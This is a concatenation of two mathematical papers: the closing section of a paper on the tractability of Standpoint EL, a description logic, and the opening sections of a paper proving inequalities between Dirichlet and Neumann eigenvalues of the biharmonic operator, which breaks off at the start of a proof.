rigidity of roles (i.e., the interpretation of certain distinguished roles being the same throughout all presciifications) would represent a desirable modelling feature. Other modal extensions of DLs have easily been shown to even become undecidable when this feature is permitted, but as \(\mathbb{S}_{\mathcal{EL}}\) uses a much simplified semantics on the modal dimension, these results do not carry over to \(\mathbb{S}_{\mathcal{EL}}\). Yet, we will show that just the presence of _one_ distinguished rigid role \(\dot{R}\) causes \(\mathbb{S}_{\mathcal{EL}}\) to become intractable as satisfiability turns coNP-hard. To demonstrate this, we reduce 3SAT to KB unsatisfiability. As above, assume an instance \(\phi=\bigvee\mathbf{C}_{1}\land\ldots\land\bigvee\mathbf{C}_{n}\) of 3SAT over propositional variables \(P=\{p_{1},\ldots,p_{k}\}\). Then \(\phi\) is satisfiable iff the following \(\mathbb{S}_{\mathcal{EL}}\) TBox is unsatisfiable (with all axioms instantiated for \(1\leq i\leq k\)): \[\begin{array}{l}\top\sqsubseteq\exists T.L_{0}\hskip 14.226378ptL_{k} \sqsubseteq\lozenge_{*}S\\ L_{i-1}\sqsubseteq\exists R.\square_{*}(L_{i}\sqcap T_{p_{i}})\hskip 14.226378pt \exists\dot{R}.(T_{p_{i}}\sqcap S)\sqsubseteq(T_{p_{i}}\sqcap S)\\ L_{i-1}\sqsubseteq\exists\dot{R}.\square_{*}(L_{i}\sqcap T_{\neg p_{i}})\hskip 14.226378pt \exists\dot{R}.(T_{\neg p_{i}}\sqcap S)\sqsubseteq(T_{\neg p_{i}}\sqcap S)\\ T_{\ell}\sqsubseteq T_{\mathbb{C}_{j}}\hskip 14.226378pt\text{for all }\ell\in \mathbb{C}_{j}\hskip 14.226378ptT_{\mathbb{C}_{1}}\sqcap\ldots\sqcap T_{\mathbb{C}_{n}} \sqsubseteq\bot\end{array}\] **Nominal Concepts** Nominal concepts are a modelling feature widely used in ontology languages. For an individual \(o\), the nominal concept \(\{o\}\) refers to the singleton set \(\{o^{\mathcal{I}}\}\). Let \(\mathcal{ELO}\) denote \(\mathcal{EL}\) extended by nominal concepts. Several formalisms subsuming \(\mathcal{ELO}\), including OWL 2 EL, are known to allow for tractable reasoning [1, 2]. However, in the presence of standpoints, nominals prove to be detrimental for the reasoning complexity: satisfiability of \(\mathbb{S}_{\mathcal{ELO}}\) TBoxes using just one nominal concept \(\{o\}\) turns out to be ExpTime-hard and thus definitely harder than for \(\mathbb{S}_{\mathcal{EL}}\). This can be shown by a PTime reduction of satisfiability for Horn-\(\mathcal{ALC}\) TBoxes (which is known to be ExpTime-complete [13]) to satisfiability of \(\mathbb{S}_{\mathcal{ELO}}\) TBoxes with just one standpoint (the global one) and one nominal concept \(\{o\}\). To this end, recall that any Horn-\(\mathcal{ALC}\) TBox can be normalised in PTime to consist of only axioms of the following shapes: \[A\sqsubseteq B\hskip 14.226378ptA\sqcap B\sqsubseteq C\hskip 14.226378pt\exists R.A\sqsubseteq B\hskip 14.226378ptA\sqsubseteq\exists R.B\hskip 14.226378ptA \sqsubseteq\forall R.B\] where \(A\) and \(B\) can be concept names, \(\top\), or \(\bot\). From a normalised Horn-\(\mathcal{ALC}\) TBox \(\mathcal{T}\), we obtain the target \(\mathbb{S}_{\mathcal{ELO}}\) TBox \(\mathcal{T}^{\prime}\) by (i) declaring every original concept name as rigid via the axiom \(A\sqsubseteq\square_{*}A\) as well as (ii) replacing every axiom of the shape \(A\sqsubseteq\exists R.B\) by the axiom \[A\sqsubseteq\lozenge_{*}((\exists\mathit{Src.}\{o\})\sqcap(\exists R.(B\sqcap \exists\mathit{Tgt.}\{o\})))\] (introducing two fresh role names \(\mathit{Src}\) and \(\mathit{Tgt}\)), and replacing every axiom of the shape \(A\sqsubseteq\forall r.B\) by the two axioms \[A\sqcap\exists R.\top\sqsubseteq(\exists\mathit{Src.}(\{o\}\sqcap\ddot{B})) \hskip 14.226378pt\text{and}\hskip 14.226378pt\exists\mathit{Tgt.}\ddot{B} \sqsubseteq B,\] introducing a copy \(\ddot{A}\) for every original concept name \(A\). With this polytime translation, satisfiability of the Horn-\(\mathcal{ALC}\) TBox \(\mathcal{T}\) and the \(\mathbb{S}_{\mathcal{ELO}}\) TBox \(\mathcal{T}^{\prime}\) coincide. ## 5 Conclusion and Future Work In this paper we introduced Standpoint \(\mathcal{EL}\), a new, lightweight member of the emerging family of standpoint logics. We described the new modelling and reasoning capabilities it brings to large-scale ontology management and established a PTime (and thus worst-case optimal) tableau-based decision procedure for standard reasoning tasks. We also demonstrated that certain extensions of \(\mathbb{S}_{\mathcal{EL}}\), which would be desirable from a expressivity point of view, inevitably come with a loss of tractability (sometimes under the assumption \(\mathrm{P}\neq\mathrm{NP}\)). Yet several modelling features can be accommodated into \(\mathbb{S}_{\mathcal{EL}}\) without endangering tractability. For instance, from a usability perspective, it would seem very advantageous if not just single axioms, but whole axiom sets (up to whole knowledge bases) could be preceded by standpoint modalities. By definition, an axiom of the type \(\square_{*}\mathcal{K}\) can be equivalently rewritten into the axiom set \(\{\square_{*}\phi\mid\phi\in\mathcal{K}\}\). While something alike is not immediately possible for axioms of the type \(\lozenge_{*}\mathcal{K}\), our normalization rule for diamond-preceded axioms can be lifted and thus \(\lozenge_{*}\mathcal{K}\) can be rewritten to \(\square_{*}\mathcal{K}\) (and further to \(\{\square_{*}\varphi\mid\phi\in\mathcal{K}\}\)) upon introducing a fresh standpoint name \(\mathsf{s}^{\prime}\) and asserting \(\mathsf{s}^{\prime}\preceq\mathsf{s}\). Thus standpoint-modality-annotated knowledge bases come essentially for free in \(\mathbb{S}_{\mathcal{EL}}\). In fact, we already made use of this modelling feature in Axiom 9 and Axiom 10 of our initial example. Moreover, we are confident that, as opposed to nominal concepts, other modelling features of OWL 2 EL can be added to \(\mathbb{S}_{\mathcal{EL}}\) without harming tractability. These include complex role inclusions (also called role-chain axioms) such as \(\mathsf{FindingSite}\circ\mathsf{Partof}\sqsubseteq\mathsf{FindingSite}\), and the self-concept as in ApoptoticCell \(\sqsubseteq\exists\mathtt{Destroys.Self}\). It also seems plausible that the sharpening statements can be extended to incorporate intersection and disjointness of standpoints. Beyond exploring the tractability boundaries, next endeavours include to investigate feasible strategies for developing a \(\mathbb{S}_{\mathcal{EL}}\) reasoner. Options include * to implement our tableau algorithm from scratch or by modifying existing open-source tableaux systems, * to design a deduction calculus over normalised axioms that can be translated into a datalog program, akin to the approach of Krotzsch [10], then utilizing a state-of-the-art datalog engine like VLog [10], or * to find a reduction to reasoning in standpoint-free (PTime extensions of) \(\mathcal{EL}\) that is supported by existing reasons (such as ELK [13] or Snorocket [13]). With one or several reasoners in place, appropriate experiments will be designed and conducted to assess practical feasibility and scalability. Beyond the \(\mathcal{EL}\) family, further popular and computationally lightweight formalisms exist, such as the tractable profiles OWL 2 RL and OWL 2 QL [13]. It would be interesting to investigate options to extend these by standpoint reasoning without sacrificing tractability. More generally, we intend to research the effect of adding standpoints to KR languages - light- or heavyweight - in terms of computational properties and expressivity as well as avenues for implementing efficient reasoners for them.
2305.18075
Improved inequalities between Dirichlet and Neumann eigenvalues of the biharmonic operator
We prove that the $(k+d)$-th Neumann eigenvalue of the biharmonic operator on a bounded connected $d$-dimensional $(d\ge2)$ Lipschitz domain is not larger than its $k$-th Dirichlet eigenvalue for all $k\in\mathbb{N}$. For a special class of domains with symmetries we obtain a stronger inequality. Namely, for this class of domains, we prove that the $(k+d+1)$-th Neumann eigenvalue of the biharmonic operator does not exceed its $k$-th Dirichlet eigenvalue for all $k\in\mathbb{N}$. In particular, in two dimensions, this special class consists of domains having an axis of symmetry.
Vladimir Lotoreichik
2023-05-29T13:21:22Z
http://arxiv.org/abs/2305.18075v1
# Improved inequalities between Dirichlet and Neumann eigenvalues of the biharmonic operator ###### Abstract. We prove that the \((k+d)\)-th Neumann eigenvalue of the biharmonic operator on a bounded connected \(d\)-dimensional (\(d\geq 2\)) Lipschitz domain is not larger than its \(k\)-th Dirichlet eigenvalue for all \(k\in\mathbb{N}\). For a special class of domains with symmetries we obtain a stronger inequality. Namely, for this class of domains, we prove that the \((k+d+1)\)-th Neumann eigenvalue of the biharmonic operator does not exceed its \(k\)-th Dirichlet eigenvalue for all \(k\in\mathbb{N}\). In particular, in two dimensions, this special class consists of domains having an axis of symmetry. ## 1. Introduction Eigenvalue inequalities for differential operators is a classical topic in spectral theory. The aim of the present paper is to obtain inequalities between Dirichlet and Neumann eigenvalues of the biharmonic operator on a bounded domain in the spirit of the eigenvalue inequality proved by Friedlander [11], which states that the \((k+1)\)-th Neumann eigenvalue of the Laplacian does not exceed its \(k\)-th Dirichlet eigenvalue. Recently, Provenzano [11] obtained among other results an inequality of this type for the biharmonic operator and conjectured its improved variant. Our analysis is largely inspired by this conjecture. We obtain an eigenvalue inequality for the biharmonic operator, which significantly improves the inequality in [11] in the space dimension \(d\geq 3\), but it still remains weaker than the conjectured inequality. Moreover, for a class of domains with symmetries we managed to prove the eigenvalue inequality for the biharmonic operator conjectured in [11]. The spectral analysis of the biharmonic operator was initially motivated by applications in classical mechanics in the study of vibration of plates [10]. It is now an independent mathematical area with many challenging open problems. Let us now introduce the biharmonic operators with Dirichlet and Neumann boundary conditions on a bounded domain. Let \(\Omega\subset\mathbb{R}^{d}\), \(d\geq 2\), be a bounded connected Lipschitz domain. As usual, we denote by \(H^{2}(\Omega)\) the \(L^{2}\)-based second-order Sobolev space on \(\Omega\) and by \(H^{2}_{0}(\Omega)\) the closure of \(C^{\infty}_{0}(\Omega)\) in \(H^{2}(\Omega)\). The non-negative, densely defined quadratic forms \[\mathfrak{h}_{\mathrm{D}}[u] :=\sum_{i,j=1}^{d}\|\partial_{ij}u\|_{L^{2}(\Omega)}^{2},\qquad \operatorname{dom}\mathfrak{h}_{\mathrm{D}}:=H^{2}_{0}(\Omega),\] \[\mathfrak{h}_{\mathrm{N}}[u] :=\sum_{i,j=1}^{d}\|\partial_{ij}u\|_{L^{2}(\Omega)}^{2},\qquad \operatorname{dom}\mathfrak{h}_{\mathrm{N}}:=H^{2}(\Omega), \tag{1.1}\] are closed in the Hilbert space \(L^{2}(\Omega)\) (see _e.g._[1, Theorem 2.1]); here we use the abbreviation \(\partial_{ij}u:=\frac{\partial^{2}u}{\partial x_{i}\partial x_{j}}\) for \(i,j\in\{1,2,\dots,d\}\). The self-adjoint Dirichlet and Neumann biharmonic operators \(\mathsf{H}_{\mathrm{D}}\) and \(\mathsf{H}_{\mathrm{N}}\) on \(\Omega\) are associated with the quadratic forms \(\mathfrak{h}_{\mathrm{D}}\) and \(\mathfrak{h}_{\mathrm{N}}\), respectively, via the first representation theorem [10, Theorem VI 2.1]. It is not hard to check via integration by parts that both operators act as the biharmonic operator \(\Delta^{2}\) on functions satisfying appropriate boundary conditions, which are specified in Remark 2.1 below. The spectra of these operators are purely discrete. In the two-dimensional setting (\(d=2\)), the Dirichlet biharmonic operator describes the vibrations of a clamped plate, while its Neumann counterpart describes the free plate. The literature on the biharmonic operators is quite extensive and it is not possible to make a complete overview. Many contributions are devoted to spectral isoperimetric inequalities [1, 1, 2, 10, 11, 12]. Asymptotic expansions of the eigenvalues of the biharmonic operator are considered in [13, 14, 15]. Bounds on the eigenvalues of the biharmonic operator are obtained in [16, 17, 18]. Let us now discuss in detail the results obtained in [14] by Provenzano. We denote by \(\{\lambda_{k}\}_{k\geq 1}\) and \(\{\mu_{k}\}_{k\geq 1}\) the eigenvalues of \(\mathsf{H}_{\mathrm{D}}\) and \(\mathsf{H}_{\mathrm{N}}\), respectively, enumerated in the non-decreasing order and repeated with multiplicities taken into account. The following inequality is proved in [14, Theorem 1.1] \[\mu_{k+2}<\lambda_{k},\qquad\text{for all }k\in\mathbb{N}. \tag{1.2}\] In [14], a more general inequality for the polyharmonic operators on \(\Omega\) is actually proved, which reduces to (1.2) in the case of the biharmonic operator. In the same paper it was conjectured that the inequality (1.2) can be strengthened as \[\mu_{k+d+1}\leq\lambda_{k},\qquad\text{for all }k\in\mathbb{N}\qquad\text{( conjecture)}, \tag{1.3}\] and that the inequality in (1.3) might even be always strict. In the present paper we improve the inequality (1.2) in the space dimension \(d\geq 3\) in the general setting and prove the conjectured inequality (1.3) for a class of domains having additional symmetries. Our first result concerns the general case for higher space dimensions. **Theorem 1.1**.: _For the space dimension \(d\geq 3\), the following inequality holds_ \[\mu_{k+d}\leq\lambda_{k},\qquad\text{for all }k\in\mathbb{N}.\] The proof of the above theorem still works in two dimensions and gives \(\mu_{k+2}\leq\lambda_{k}\) for all \(k\in\mathbb{N}\), which is slightly weaker than the inequality (1.2). For this reason we have excluded the case \(d=2\) from the formulation. In order to formulate the second result we introduce for \(l\in\{2,\dots,d\}\) the mapping \[\mathsf{J}_{l}\colon\mathbb{R}^{d}\to\mathbb{R}^{d},\qquad\mathsf{J}_{l}x:=(x _{1},x_{2},\dots,-x_{l},\dots,x_{d})^{\top}, \tag{1.4}\] where \(x=(x_{1},x_{2},\dots,x_{d})^{\top}\). The domain \(\Omega\) is symmetric with respect to the hyperplane \(\{x\in\mathbb{R}^{d}\colon x_{l}=0\}\) with \(l\in\{2,\dots,d\}\) in the case that \(\mathsf{J}_{l}(\Omega)=\Omega\). **Theorem 1.2**.: _Let \(d\geq 2\) and assume that the bounded connected Lipschitz domain \(\Omega\) is such that \(\mathsf{J}_{l}(\Omega)=\Omega\) for all \(l\in\{2,\dots,d\}\). Then the following inequality holds_ \[\mu_{k+d+1}\leq\lambda_{k},\qquad\text{for all }k\in\mathbb{N}.\] The special role of the \(x_{1}\)-axis in the formulation of Theorem 1.2 is not restrictive. Since we are allowed to translate and rotate the domain \(\Omega\), we only require that \(\Omega\) is symmetric with respect to \(d-1\) mutually orthogonal hyperplanes. In two dimensions, the condition in Theorem 1.2 is equivalent to the fact that \(\Omega\) has an axis of symmetry. Theorem 1.2 applies, in particular, to ellipses, rectangles, isosceles triangles, and annuli. In three dimensions, Theorem 1.2 can be applied, for example, to the cylindrical domain \(\Omega=(0,h)\times\omega\subset\mathbb{R}^{3}\) of some positive height \(h>0\) and with the cross-section \(\omega\subset\mathbb{R}^{2}\) being a bounded connected Lipschitz domain with an axis of symmetry. The proofs of Theorems 1.1 and 1.2 rely on the min-max principle, for which we construct a subspace of trial functions using a modification of the approach suggested by Filonov in [15] for the proof of a similar inequality between Dirichlet and Neumann eigenvalues of the Laplacian. The key idea is to construct a trial subspace for \(\mathsf{H}_{\mathrm{N}}\) as a span of \(k\) orthonormal eigenfunctions of \(\mathsf{H}_{\mathrm{D}}\) corresponding to its first \(k\) eigenvalues and of \(d\) additional functions for the proof of Theorem 1.1 and, respectively, \(d+1\) additional functions for the proof of Theorem 1.2. These additional functions are constructed in a different way than in the paper [14]. Our construction better reflects the properties of the biharmonic operator. Any non-trivial function \(u\) from the span of the additional functions belongs to \(H^{2}(\Omega)\), is linearly independent from the span of \(k\) orthonormal eigenfunctions of \(\mathsf{H}_{\mathrm{D}}\) corresponding to its first \(k\) eigenvalues, and satisfies the identities \[\Delta^{2}u=\lambda_{k}u\qquad\text{and}\qquad\sum_{i,j=1}^{d}\|\partial_{ij}u\| _{L^{2}(\Omega)}^{2}=\lambda_{k}\|u\|_{L^{2}(\Omega)}^{2}. \tag{1.5}\] The second property in (1.5) is achieved by the construction of the additional functions satisfying a number of orthogonality relations. In the proof of Theorem 1.1 we make use of the Borsuk-Ulam theorem to achieve the required orthogonality. In the proof of Theorem 1.2 these relations are satisfied thanks to the rich symmetry properties of the domain. In order to position our work in the existing literature we review known results on inequalities between Dirichlet and Neumann eigenvalues. Such inequalities is a classical topic for the Laplace operator. We will denote by \(\{\widehat{\lambda}_{k}\}_{k\geq 1}\) and \(\{\widehat{\mu}_{k}\}_{k\geq 1}\) the eigenvalues of the Laplace operator on a bounded domain with, respectively, Dirichlet and Neumann boundary conditions, enumerated in the non-decreasing order and repeated with multiplicities taken into account. Polya proved in [10] that \(\widehat{\mu}_{2}<\widehat{\lambda}_{1}\) in two dimensions for smooth domains. For convex, two-dimensional domains with \(C^{2}\)-boundary Payne proved in [10] that \(\widehat{\mu}_{k+2}<\widehat{\lambda}_{k}\) for all \(k\in\mathbb{N}\). The result of Payne was generalized by Levine and Weinberger [11], who proved the inequality \(\widehat{\mu}_{k+d}\leq\widehat{\lambda}_{k}\) for all \(k\in\mathbb{N}\), for any convex domain. For general (not necessarily convex) bounded \(C^{1}\)-smooth domains in any space dimension the inequality \(\widehat{\mu}_{k+1}\leq\widehat{\lambda}_{k}\) for all \(k\in\mathbb{N}\) was obtained by Friedlander in [12]. Filonov [10] simplified the argument by Friedlander and showed that the strict inequality \(\widehat{\mu}_{k+1}<\widehat{\lambda}_{k}\) holds for all \(k\in\mathbb{N}\), for a class of domains even less regular than Lipschitz. Similar type inequalities are also later obtained for other types of differential operators: see [13] for the sub-Laplacian on the Heisenberg group and the magnetic Laplacian, [14] for the Laplacian with mixed boundary conditions, and [15] for the Stokes operator. The present paper belongs to the same line of research. It remains to outline the structure of the paper. In Section 2 we collect preliminary facts and auxiliary lemmas, which will later be used in the proofs of the main results. In the same preliminary section, we also provide more details on the Dirichlet and Neumann spectral problems for the biharmonic operator. In Section 3 we prove Theorem 1.1 and, finally, in Section 4 we prove Theorem 1.2. The proofs of these two theorems share common ideas, but we prefer to provide both arguments in full detail for the convenience of the reader. ## 2. **Preliminaries** In this preliminary section we collect a number of tools used in the proofs of the main results. First, in Subsection 2.1 we recall known properties of the biharmonic operators with Dirichlet and Neumann boundary conditions. Next, in Subsection 2.2 we state a lemma based on the unique continuation principle for the Laplace operator. Finally, in Subsection 2.3 we present an auxiliary construction based on the Borsuk-Ulam theorem of a special family of orthogonal functions. This family will be used in the proof of Theorem 1.1. ### Dirichlet and Neumann biharmonic operators Recall that \(\Omega\subset\mathbb{R}^{d}\), \(d\geq 2\), is a bounded connected Lipschitz domain and that the biharmonic operators \(\mathsf{H}_{\mathrm{D}}\) and \(\mathsf{H}_{\mathrm{N}}\) with Dirichlet and Neumann boundary conditions are associated with the quadratic forms \(\mathfrak{h}_{\mathrm{D}}\) and \(\mathfrak{h}_{\mathrm{N}}\), respectively, defined in (1.1). _Remark 2.1_.: In this remark we will provide strong formulations of the spectral problems for \(\mathsf{H}_{\mathrm{D}}\) and \(\mathsf{H}_{\mathrm{N}}\). It is not difficult to verify via integration by parts that the spectral problem for the Dirichlet biharmonic operator \(\mathsf{H}_{\mathrm{D}}\) can be written in the strong formulation as \[\begin{cases}\Delta^{2}u=\lambda u,&\text{in }\Omega,\\ u=0,&\text{on }\partial\Omega,\\ \frac{\partial u}{\partial\nu}=0,&\text{on }\partial\Omega,\end{cases} \tag{2.1}\] where \(\frac{\partial}{\partial\nu}\) stands for the normal derivative on the boundary with the normal pointing outwards of \(\Omega\) and where \(\lambda\) is the spectral parameter. This strong formulation of the spectral problem for \(\mathsf{H}_{\mathrm{D}}\) means that a non-trivial function \(u\in H^{2}(\Omega)\) is an eigenfunction of \(\mathsf{H}_{\mathrm{D}}\) if, and only if, it satisfies the system (2.1) with a certain value of the spectral parameter \(\lambda\). The strong formulation of the spectral problem for the Neumann biharmonic operator involves a rather complicated boundary condition and it was derived in [11, Proposition 5] (see also [22]). Assuming, in addition, that \(\Omega\) is a \(C^{\infty}\)-smooth domain, the spectral problem for \(\mathsf{H}_{\mathrm{N}}\) can be written as \[\begin{cases}\Delta^{2}u=\mu u,&\text{in }\Omega,\\ \frac{\partial^{2}u}{\partial\nu^{2}}=0,&\text{on }\partial\Omega,\\ \frac{\partial(\lambda u)}{\partial\nu}+\operatorname{div}_{\partial\Omega}( P_{\partial\Omega}[(D^{2}u)\nu])=0,&\text{on }\partial\Omega,\end{cases} \tag{2.2}\] where \(\frac{\partial^{2}}{\partial\nu^{2}}\) stands for the second-order normal derivative on the boundary, \(\operatorname{div}_{\partial\Omega}\) is the surface divergence on \(\partial\Omega\), \(P_{\partial\Omega}\) orthogonally projects the vector in \(\mathbb{R}^{d}\) at \(x\in\partial\Omega\) into the tangent plane of \(\partial\Omega\) at \(x\), \(D^{2}u\) is the Hessian of the function \(u\), \(\nu\) stands for the outer unit normal vector for \(\Omega\), and \(\mu\) is the spectral parameter. It can be checked that any eigenfunction of \(\mathsf{H}_{\mathrm{N}}\) on a bounded \(C^{\infty}\)-smooth domain belongs to \(C^{\infty}(\overline{\Omega})\) (see [11, Proposition 2]). The above strong formulation of the spectral problem for \(\mathsf{H}_{\mathrm{N}}\) on a bounded \(C^{\infty}\)-smooth domain means that a non-trivial function \(u\in H^{2}(\Omega)\) is an eigenfunction of \(\mathsf{H}_{\mathrm{N}}\) if, and only if, \(u\) belongs to \(C^{\infty}(\overline{\Omega})\) and satisfies the equations in (2.2) with a certain value of the spectral parameter \(\mu\). We also remark that as an interpolation between Dirichlet and Neumann boundary conditions, the Robin boundary conditions for the biharmonic operator were recently introduced [22, 20, 23]. Recall that \(\{\lambda_{k}\}_{k\geq 1}\) and \(\{\mu_{k}\}_{k\geq 1}\) denote the eigenvalues of the biharmonic operators \(\mathsf{H}_{\mathrm{D}}\) and \(\mathsf{H}_{\mathrm{N}}\), respectively, enumerated in the non-decreasing order and repeated with multiplicities taken into account. By the min-max principle [10, SS4.5] (see also [23, Theorem 1.28]) these eigenvalues can be characterised as follows \[\lambda_{k} =\inf_{\begin{subarray}{c}\mathcal{L}\subset H_{\mathrm{D}}^{2} (\Omega)\\ \dim\mathcal{L}=k\end{subarray}}\sup_{u\in\mathcal{L}\setminus\{0\}}\frac{ \sum_{i,j=1}^{d}\|\partial_{ij}u\|_{L^{2}(\Omega)}^{2}}{\|u\|_{L^{2}(\Omega)} ^{2}},\qquad k\in\mathbb{N}, \tag{2.4}\] \[\mu_{k} =\inf_{\begin{subarray}{c}\mathcal{L}\subset H^{2}(\Omega)\\ \dim\mathcal{L}=k\end{subarray}}\sup_{u\in\mathcal{L}\setminus\{0\}}\frac{ \sum_{i,j=1}^{d}\|\partial_{ij}u\|_{L^{2}(\Omega)}^{2}}{\|u\|_{L^{2}(\Omega)} ^{2}},\qquad k\in\mathbb{N}, \tag{2.3}\] where the infima are taken with respect to \(k\)-dimensional linear subspaces of the respective Sobolev spaces. Moreover, the infimum in (2.3) is attained on the span of \(k\) orthonormal eigenfunctions of \(\mathsf{H}_{\mathrm{D}}\) corresponding to the eigenvalues \(\lambda_{1},\lambda_{2},\ldots,\lambda_{k}\) and, in this case, the supremum is attained when \(u\) is an eigenfunction of \(\mathsf{H}_{\mathrm{D}}\) corresponding to the eigenvalue \(\lambda_{k}\). Analogously, the infimum in (2.4) is attained on the span of \(k\) orthonormal eigenfunctions of \(\mathsf{H}_{\mathrm{N}}\) corresponding to the eigenvalues \(\mu_{1},\mu_{2},\ldots,\mu_{k}\) and, in this case, the supremum is attained when \(u\) is an eigenfunction of \(\mathsf{H}_{\mathrm{N}}\) corresponding to \(\mu_{k}\). In particular, for the Dirichlet biharmonic operator we get that for any \(k\in\mathbb{N}\) there exists a linear subspace \(\mathcal{L}\subset H_{0}^{2}(\Omega)\) with \(\dim\mathcal{L}=k\) such that \[\mathsf{h}_{\mathrm{D}}[u]\leq\lambda_{k}\|u\|_{L^{2}(\Omega)}^{2},\qquad\text {for all }u\in\mathcal{L}. \tag{2.5}\] This linear subspace \(\mathcal{L}\) is constructed as a span of \(k\) orthonormal eigenfunctions of \(\mathsf{H}_{\mathrm{D}}\) corresponding to its first \(k\) eigenvalues. _Remark 2.2_.: Let us introduce the characteristic function \(\chi_{\Omega}\) of \(\Omega\) and the functions \(f_{k}(x):=x_{k}\) for \(k\in\{1,2,\ldots,d\}\). Clearly, the family of functions \(\{\chi_{\Omega},f_{1},f_{2},\ldots,f_{d}\}\) is linearly independent in \(L^{2}(\Omega)\). According to [17, Theorem 7] we have the following characterisation \[\ker\mathsf{H}_{\mathrm{N}}=\operatorname{span}\big{\{}\chi_{\Omega},f_{1},f_{2 },\ldots,f_{d}\big{\}}.\] Hence, we conclude that \(\mu_{1}=\mu_{2}=\cdots=\mu_{d+1}=0\) and that \(\mu_{d+2}>0\). It can also be easily checked that \(\lambda_{1}>0\). For \(k=1\) the inequality in Theorem 1.1 naturally follows from these simple observations. The inequality in Theorem 1.1 becomes non-trivial for \(k>1\). ### A unique continuation lemma In this short subsection we recall a useful result based on the unique continuation for the Laplace operator. **Lemma 2.3**.: _[_1_, Proposition 2.5]_ _Let \(\Omega\subset\mathbb{R}^{d}\) be a bounded connected Lipschitz domain. Let \(\lambda\in\mathbb{R}\) and let \(u\in H^{2}_{0}(\Omega)\) be such that \(-\Delta u=\lambda u\) in \(\Omega\). Then \(u\equiv 0\)._ This lemma is essentially equivalent to the fact no eigenfunction of the Dirichlet Laplacian on \(\Omega\) can simultaneously satisfy the Neumann boundary condition on \(\partial\Omega\). It will be used to show that the additional functions in the construction of the trial subspace for the min-max principle in the proofs of the main results are linearly independent from the spans of the eigenfunctions of the Dirichlet biharmonic operator. ### A construction of special orthogonal functions We will present a construction of \(d\) (dimension of \(\Omega\)) mutually orthogonal functions in the Hilbert space \(L^{2}(\Omega)\). This construction is used in the proof of Theorem 1.1. To this aim we recall the definition of an odd continuous function on the \(n\)-dimensional unit sphere \(\mathbb{S}^{n}\subset\mathbb{R}^{n+1}\), \(n\in\mathbb{N}\), centred at the origin. **Definition 2.4**.: _For \(n\in\mathbb{N}\), a continuous function \(g\colon\mathbb{S}^{n}\to\mathbb{R}^{n}\) is called odd if \(g(\theta)=-g(-\theta)\) for any \(\theta\in\mathbb{S}^{n}\)._ Next, we will formulate the Borsuk-Ulam theorem for odd functions. **Proposition 2.5**.: _[_1_, Theorem 2.1.1]_ _For any \(n\in\mathbb{N}\) and any continuous odd function \(g\colon\mathbb{S}^{n}\to\mathbb{R}^{n}\) there exists a point \(\theta_{\star}\in\mathbb{S}^{n}\) such that \(g(\theta_{\star})=0\)._ Now we are ready to present the construction of the orthogonal functions. In the formulation and the proof of this lemma we will use the standard notation \(x\cdot y=\sum_{j=1}^{d}x_{j}y_{j}\) for the scalar product in \(\mathbb{R}^{d}\) of vectors \(x=(x_{1},x_{2},\dots,x_{d})\) and \(y=(y_{1},y_{2},\dots,y_{d})\). **Lemma 2.6**.: _Let \(\Omega\subset\mathbb{R}^{d}\), \(d\geq 2\), be a bounded connected Lipschitz domain. For any \(\lambda>0\) one can find \(d\) vectors \(\omega_{l}\in\mathbb{R}^{d}\) with \(|\omega_{l}|^{4}=\lambda\) for \(l\in\{1,2,\dots,d\}\) such that the functions_ \[v_{l}(x):=\sin(\omega_{l}\cdot x)\in L^{2}(\Omega),\qquad l\in\{1,2,\dots,d\}\] _satisfy the orthogonality relations_ \[\int_{\Omega}v_{i}(x)v_{j}(x)\,\mathrm{d}x=0,\qquad i\neq j. \tag{2.6}\] Proof.: The construction proceeds in \(d\) steps. In the first step we take an arbitrary vector \(\omega_{1}\in\mathbb{R}^{d}\) satisfying \(|\omega_{1}|^{4}=\lambda\) and by that we also fix the function \(v_{1}(x):=\sin(\omega_{1}\cdot x)\in L^{2}(\Omega)\). In the second step, in order to construct the second vector \(\omega_{2}\) we consider the function \[g_{2}\colon\mathbb{S}^{d-1}\to\mathbb{R}^{d-1},\qquad g_{2}(\theta):=\big{(}( v_{1},\sin(\lambda^{\frac{1}{4}}(\theta\cdot x))_{L^{2}(\Omega)},0,0,\dots,0)^{ \top}.\] By its construction the function \(g_{2}\) is a continuous odd function in the sense of Definition 2.4 (with \(n=d-1\)). Indeed, we clearly get by the Lebesgue dominated convergence theorem that \[\int_{\Omega}v_{1}(x)\sin(\lambda^{\frac{1}{4}}(\theta\cdot x))\,\mathrm{d}x \to\int_{\Omega}v_{1}(x)\sin(\lambda^{\frac{1}{4}}(\theta^{\prime}\cdot x))\, \mathrm{d}x,\qquad\text{as $\theta\to\theta^{\prime}$ in $\mathbb{S}^{d-1}$},\] because the integrands converge pointwise and the characteristic function \(\chi_{\Omega}\) of \(\Omega\) is the integrable majorant. The relation \(g_{2}(\theta)=-g_{2}(-\theta)\) follows from the fact that \(\sin(\lambda^{\frac{1}{4}}(-\theta\cdot x))=-\sin(\lambda^{\frac{1}{4}}(\theta \cdot x))\). Hence, by Proposition 2.5 there exists a point \(\theta_{2}\in\mathbb{S}^{d-1}\) such that \(g_{2}(\theta_{2})=0\). We set \(\omega_{2}=\theta_{2}\lambda^{\frac{1}{4}}\) and in this way the function \(v_{2}(x)=\sin(\omega_{2}\cdot x)\) is also fixed. In the \(l\)-th step (\(l\leq d\)), in order to construct the vector \(\omega_{l}\) we consider the function \(g_{l}\colon\mathbb{S}^{d-1}\to\mathbb{R}^{d-1}\) defined by \[g_{l}(\theta):=\Big{(}(v_{1},\sin(\lambda^{\frac{1}{4}}(\theta\cdot x))_{L^{2}( \Omega)},(v_{2},\sin(\lambda^{\frac{1}{4}}(\theta\cdot x))_{L^{2}(\Omega)} \ldots,(v_{l-1},\sin(\lambda^{\frac{1}{4}}(\theta\cdot x))_{L^{2}(\Omega)},0, \ldots,0\Big{)}^{\top}.\] Analogously we find that \(g_{l}\) is a continuous odd function in the sense of Definition 2.4. Hence, by Proposition 2.5 there exists \(\theta_{l}\in\mathbb{S}^{d}\) such that \(g_{l}(\theta_{l})=0\). We set \(\omega_{l}:=\lambda^{\frac{1}{4}}\theta_{l}\) and define \(v_{l}(x):=\sin(\omega_{l}\cdot x)\). We repeat this step until \(l=d\). The orthogonality conditions in (2.6) are satisfied thanks to the choice of the points \(\theta_{l}\in\mathbb{S}^{d-1}\), \(l\in\{2,3,\ldots,d\}\). _Remark 2.7_.: It is clearly seen from the proof of Lemma 2.6 that it is not, in general, possible to construct more than \(d\) orthogonal functions of the same type using our approach based on the Borsuk-Ulam theorem. ## 3. **Proof of Theorem 1.1** The proof is divided into two steps. In the first step we construct a trial subspace of functions, which is then used in the second step together with the min-max principle. _Step 1: construction of a trial 